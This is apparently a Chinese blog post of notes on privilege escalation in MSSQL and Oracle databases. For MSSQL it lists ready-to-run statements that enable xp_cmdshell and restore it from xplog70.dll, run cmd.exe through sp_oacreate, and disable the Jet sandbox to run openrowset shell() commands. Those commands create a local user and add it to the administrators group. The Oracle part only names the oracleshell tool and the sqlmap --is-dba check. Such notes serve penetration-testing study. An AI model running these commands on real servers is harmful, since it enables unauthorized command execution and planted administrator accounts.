权限提升-mssql-oracle提权随笔

0x00 mssql提权方式简介

1)xp_cmd_shell提权
2)sp_oacreate提权
3)沙盒提权

xp_cmd_shell提权
mssql2000中默认开启xpcmdshell 2005以后默认禁用
管理员 sa 权限则可以用 sp_configure 重修开启它

启用:
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 1;
RECONFIGURE;

关闭:
exec sp_configure ‘show advanced options’, 1;
reconfigure;
exec sp_configure ‘xp_cmdshell’, 0;
reconfigure;

执行:
EXEC master.dbo.xp_cmdshell ‘命令’

如果 xp_cmdshell 被删除了,可以上传 xplog70.dll 进行恢复
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll’

sp_oacreate提权
主要是用来调用 OLE 对象,利用 OLE 对象的 run 方法执行系统命令。

启用:
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;

关闭:
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 0;
RECONFIGURE WITH OVERRIDE;

执行:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c whoami >c:\1.txt’

沙盒提权
mssql自带沙盒,利用沙盒执行命令
开启沙盒,使用沙盒执行命令,

exec sp_configure ‘show advanced options’,1;reconfigure;
– 不开启的话在执行 xp_regwrite 会提示让我们开启,

exec sp_configure ‘Ad Hoc Distributed Queries’,1;reconfigure;
–关闭沙盒模式,如果一次执行全部代码有问题,先执行上面两句代码。

exec master..xp_regwrite
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,0;
–查询是否正常关闭,经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句。
exec master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,
‘SandBoxMode’
– 执 行 系 统 命 令 select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,’select shell(“net user
margin margin /add”)’)
select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,’select shell(“net
localgroup administrators margin /add”)’)
沙盒模式 SandBoxMode 参数含义(默认是 2)

0x01 oracle提权方式简介

这里采用自动化工具oracleshell 提权oracle数据库,前提条件也是获取到dba的最高权限权限,并且需要知道SID,通常与账号密码在一起。
可以使用sqlmap检测是否为dbs权限,返回ture则正确

none

--is-dba  返回ture则是dba权限

工具oracleshell 直接连接 sql注入模式提权, 普通用户提权, dba权限提权三种权限

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片